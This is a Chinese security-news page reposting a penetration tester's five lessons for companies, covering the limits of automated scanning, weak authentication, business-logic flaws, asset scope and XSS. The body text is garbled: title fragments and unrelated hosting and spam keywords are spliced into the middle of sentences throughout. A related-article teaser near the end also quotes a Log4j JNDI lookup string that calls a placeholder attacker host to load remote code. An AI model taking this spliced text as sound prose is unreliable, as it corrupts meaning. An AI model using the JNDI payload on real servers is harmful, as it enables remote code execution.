您现在的位置是:网络安全 >>正文
一位网络渗透测试专家给企业的5条忠告
网络安全41521人已围观
简介架构Nick Merritt是Halo Security公司主管安全产品和服务的副总裁,他已经负责并领导开展了超过300次的网络安全渗透测试工作。通过在各类企业中的大量安全性测试实践,Nick Mer ...
架构Nick Merritt是位网Halo Security公司主管安全产品和服务的副总裁,他已经负责并领导开展了超过300次的络渗网络安全渗透测试工作 。通过在各类企业中的透测大量安全性测试实践,Nick Merritt从攻击者的试专视角,总结了目前企业组织在信息化系统防护中的企业普遍弱点和常见错误,并给出了提升应用系统安全性的忠告五点建议:
01 自动化安全扫描还远远不够如果企业只是使用自动化工具扫描Web应用程序的安全性,那么很多安全漏洞都会成为漏网之鱼,位网因为这类工具通常使用了模糊测试(一种将畸形数据注入系统来验证安全的云计算络渗方法) ,而这种技术会产生大量的透测误报和漏报。
企业应该明白,试专自动化扫描工具的企业研发还难以跟上现代Web应用程序开发的步伐 ,技术上的忠告局限性让扫描工具不能够为JavaScript页面应用、WebAssembly或图技术(Graph)提供最佳的位网安全检测结果 。特别是络渗对一些比较复杂的漏洞 ,企业安全团队需要专门编写有针对性的透测载荷才可以检测出它们。亿华云
目前,要实现对安全漏洞和利用情况进行全面的分析还离不开安全专家的人工操作,而自动化安全扫描工具可作为辅助性的检测手段 ,帮助安全分析师提升漏洞发现的效率 。
02应用系统自带的身份验证通常不可靠身份验证是确保Web应用程序安全性的关键因素之一 。但是在实际测试中发现,开发人员在应用系统中创建的身份验证及密码管理流程,模板下载通常都没有采用安全、可靠的方式 。
渗透测试人员很容易绕过系统自带的验证功能,轻松访问其他用户的隐私信息,或者拥有与其角色不相符的过多特权 ,这就会带来横向和纵向身份访问控制方面的安全威胁问题 。
企业必须要重视和加强对应用系统的身份管理和验证 ,其关键在于相关的安全协议是否能够得到有效实时 。香港云服务器比如说 ,安全声明标记语言(SAML)身份验证是一种流行并且有效的单点登录控制协议 ,但如果开发人员在系统开发时未能正确理解和引入,反而留下更多的安全漏洞。
03攻击者更善于发现业务逻辑中的漏洞开发人员在研发Web应用系统时,一般都是从产品的应用场景角度进行分析和设计,但是他们常常不会从攻击者的角度去分析各种功能是否可能被恶意利用。服务器租用一个典型的事例是电商网站中的购物车,它是这类网站的关键性应用,但常常不安全,存在严重的业务逻辑漏洞,比如攻击者在结账前将总数归零 ,或者在完成付款后将低价商品替换成其他高价值商品。
我们不能过多苛责开发人员只关注系统的使用场景,而忽视其可能的风险场景。源码库但是安全管理人员需要看到问题的各个方面,明白业务逻辑应该与安全逻辑相关联。
04不存在“超范围”的渗透测试观念Web应用程序已经变得非常复杂,会涉及较广泛的资源和资产整合与利用 。这就需要开发时通过后端API服务器利用,以支持主应用程序的各种功能。
企业应该向执行渗透测试的安全人员告知所有这些外部资产 ,以及它们如何与应用系统之间进行关联交互 ,这对保障安全很重要。开发人员可能认为这些资产“超范围” ,因此不需要对它们负责 。但攻击者可不会遵守任何的攻击界限 ,大量渗透测试结果也表明,企业中的资源和资产,没有什么是“超范围”的。
应用系统开发人员应该更好地与安全测试人员合作,减少渗透测试工作带来的流程影响。开发人员只有兼顾创造力和安全框架,才能知道哪里可以自由编程 ,而哪里需要设置应用程序安全护栏机制。
05跨站脚本(XSS)攻击不可忽视XSS属于被动式攻击 ,是一种较盛行的Web应用程序漏洞利用方式 。2021年,由于应用程序开发框架的改进,XSS首次跌出了OWASP(开放Web应用程序安全项目)前10名榜单 ,因此有人开始认为这种攻击将会很少被应用 。但事实上,“无孔不入”是网络黑客们最基本的信念和意志表现 ,它仍是我们执行每次渗透测试任务中 ,最有效的模拟攻击手法之一。
XSS攻击造成的安全风险往往会很高,包括账户接管、数据窃取以及对应用程序基础设施的全面破坏 。许多开发人员以为 ,使用成熟的输入验证库和配置适当的Cookie属性就足够防止XSS攻击 ,但实际上这远远不够 。因为在今天的应用程序开发中 ,必然会使用大量自定义的代码,此时XSS漏洞就会趁虚而入 。以WordPress网页为例 ,针对其的XSS攻击非常危险 ,因为一旦获取了管理员级访问凭据 ,攻击者就可以在应用中加载各种插件 ,并在应用服务器上执行代码中的恶意载荷。
参考链接 :
https://www.darkreading.com/application-security/5-lessons-learned-from-hundreds-of-penetration-tests
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/html/675c899316.html
上一篇:攻击面管理将走向何方?
下一篇:vivo 游戏黑产反作弊实践
相关文章
零信任的到来意味着什么?
网络安全根据2022 年 IBM 数据泄露成本报告显示,超过 80% 的组织曾发生过不止一次的数据泄露事件。到2022 年数据泄露平均损失成本达 435 万美元,创历史新高,比过去两年增长了 12.7%。过去 ...
【网络安全】
阅读更多Log4j2被爆高危漏洞,漏洞如何复现,原理是什么呢??
网络安全相信大家看到最多的就是这张图片了,打了码,还出来个计算器复制Stringsource="${jndi:rmi://黑客IP:1099/test}"; lo ...
【网络安全】
阅读更多2025,CISO的AI元年
网络安全2025年被称为“CISO的AI元年”,因为这一年,首席信息安全官CISO)们将解锁生成式人工智能GenAI)的全部潜力,开启网络安全新时代。随着生成式人工智能技术的不断成熟,其功能不再局限于回答问题 ...
【网络安全】
阅读更多
热门文章
最新文章
友情链接
- 多款热门 Chrome 扩展程序存在明文传输风险,用户隐私安全受威胁
- 运维工程师来活了,Linux 又报了两个超级漏洞(附解决方案)
- 戴尔Latitude 5420商务笔记本 优质体验 胜任多种办公需求
- 2022年及以后的四个数据中心提示
- 一键2009点了会有什么神奇的事情发生?(探索电脑神秘力量的奇妙之旅)
- 福布斯:如何确保客户的数据安全
- 将安全内建于开发流程中:威胁应对分步指南(Build Security In) - 上
- DellSE2417HG评测(适用于多种用途的高性价比显示器)
- 戴尔PowerEdge服务器 可轻松满足AI深度学习和高级计算等工作负载
- 压测利器 Apache Bench:快速上手,服务器性能一测就“露馅”! 云服务器网站建设亿华云香港物理机源码库b2b信息平台企业服务器